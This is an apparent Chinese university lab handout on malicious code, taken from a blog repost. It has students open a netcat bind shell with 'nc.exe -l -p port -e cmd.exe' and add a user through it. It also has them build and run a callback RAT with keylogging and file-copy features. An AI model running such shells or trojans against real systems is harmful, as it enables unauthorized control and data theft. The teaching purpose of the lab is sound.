学   号:201421430029

 

中国人民公安大学

Chinese people’ public security university

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

学生姓名

巩耀阳

年级

2014

区队

3

指导教师

高见老师

 

 

信息技术与网络安全学院

2016117

 

实验任务总纲

2016—2017 学年   学期

一、实验目的

1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

2.了解并熟悉常用的网络攻击工具,木马的基本功能;

3.达到巩固课程知识和实际应用的目的。

二、实验要求

1.认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰,图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3.软件工具可使用NC、MSF等。

4.实验结束后,保留电子文档。

三、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉并准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备。

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具);

开机并启动软件office2003或2007、浏览器、加解密软件。

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

任务一 利用NC控制电脑

NetCat,具有网络军刀之称,它小巧精悍且功能强大,说它小巧精悍,是因为他的软件大小现在已经压缩到只有十几KB,而且在功能上丝毫不减。

实验过程需要两个同学相互配合完成:

步骤一:

在受害者的机器 (同学A)
输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

步骤二:
  在攻击者的机器.(同学B)
输入下面的命令:
  nc ip  port //连接victim_IP,然后得到一个shell。 (需要截图)

步骤三:

在shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。(需要截图)

可以继续通过命令行做一些事情。

任务二 利用木马控制电脑

实验过程需要两个同学配合:

步骤一:

 攻击者的机器. (同学A)
打开V2014.exe程序或则star RAT,这两个木马功能类似。

步骤二:
  点击菜单栏中的“服务生成”,在弹出的配置服务端中,配置回IP地址(攻击者IP)和端口号,并点击“生成”按钮,生成木马服务端。

步骤三:

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。

步骤四:

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。

1、控制主机

2、获取桌面

3、拷贝文件

4、键盘记录

6、重启电脑

转载于:https://www.cnblogs.com/P201421430029/p/7751308.html

实验四恶意代码分析技术 201421430029相关推荐

  1. 20155222卢梓杰 实验四 恶意代码分析

    实验四 恶意代码分析 1.系统运行监控 实验步骤如下 1.使用批处理监控程序连接网络的状况 在C盘要目录下建一个文件c:\netstatlog.bat,内容如下: date /t >> c ...

  2. 20155235 《网络攻防》 实验四 恶意代码分析

    20155235 <网络攻防> 实验四 恶意代码分析 实验目的 是监控你自己系统的运行状态,看有没有可疑的程序在运行. 是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具 ...

  3. 20145231熊梓宏 《网络对抗》 实验四 恶意代码分析

    20145231熊梓宏 <网络对抗> 实验四 恶意代码分析 基础问题回答 1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么.请设计下你想监控的操 ...

  4. 实验四 恶意代码技术

    学   号201421460014 中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学 ...

  5. 实验四 恶意代码技术

    实验报告 四 学   号   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 ...

  6. 实验四——恶意代码技术

    学   号   201421430035   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术 ...

  7. 实验四 恶意代码

    中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 冷其航 年级 14级 区队 ...

  8. 【实验报告】四恶意代码实验

    学   号201421420040   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     ...

  9. 信安教程第二版-第14章恶意代码防范技术原理

    第14章恶意代码防范技术原理 14.1 恶意代码概述 261 14.1.1 恶意代码定义与分类 261 14.1.2 恶意代码攻击模型 262 14.1.3 恶意代码生存技术 263 14.1.4 恶 ...

最新文章

  1. 一文看懂计算机视觉-CV(基本原理+2大挑战+8大任务+4个应用)
  2. AI如何在安防行业更加深入?可从超高清视频监控切入
  3. Python IDE专用编辑器PyCharm下载及配置安装过程(Ubuntu环境)
  4. TPCAST无线传输模块年底将推出 Oculus Rift 版本
  5. retinaface验证
  6. .Net Micro Framework研究—TCP/IP通信
  7. Tensorflow学习教程集合
  8. Microsoft My Phone试用手记
  9. Nginx深入详解之模块化体系结构
  10. csv 文件驱动的 jMeter 并发测试
  11. 【Clickhouse】Clickhouse 整合 Prometheus 监控 运行时状态
  12. 智能锁行业安全分析报告
  13. 北师大版图形的旋转二教案_北师大版三年级数学下册微课精讲+课件教案试卷(文末下载)...
  14. 微型计算机系统教案,微型计算机硬件系统教案
  15. CGI与ISAPI的区别
  16. 推荐9个强大的谷歌插件,程序猿必备!不看后悔系列!
  17. 因为计算机中丢失MSVCp,无法启动此程序,因为计算机中丢失MSVCP140.dll的
  18. 葫芦娃用计算机,葫芦娃互通版电脑版
  19. JDK8升至JDK11 新特性整理
  20. php极简wiki,Wiki.js初体验

热门文章

  1. Kubernetes 常见运维技巧总结
  2. Excel中如何引用 「文件名」、「sheet 页」的名字
  3. 2012年3月份工作总结 ~ 之 ~ PDF 作业对应 (虽然这个作业没有什么意思,但是非常值得总结)
  4. 三次握手的本质_动画讲解TCP的3次握手,4次挥手,让你一次看明白
  5. Unity中UI界面颤抖解决方法
  6. 解决java中对URL编码的问题
  7. 关于echart 图表自适应问题的解决办法
  8. springboot 项目中在普通类中调用dao层的mapper 出现空指针异常
  9. VMware 安装提示缺少MicrosoftRuntime DLL 问题解决办法
  10. section和div有什么区别?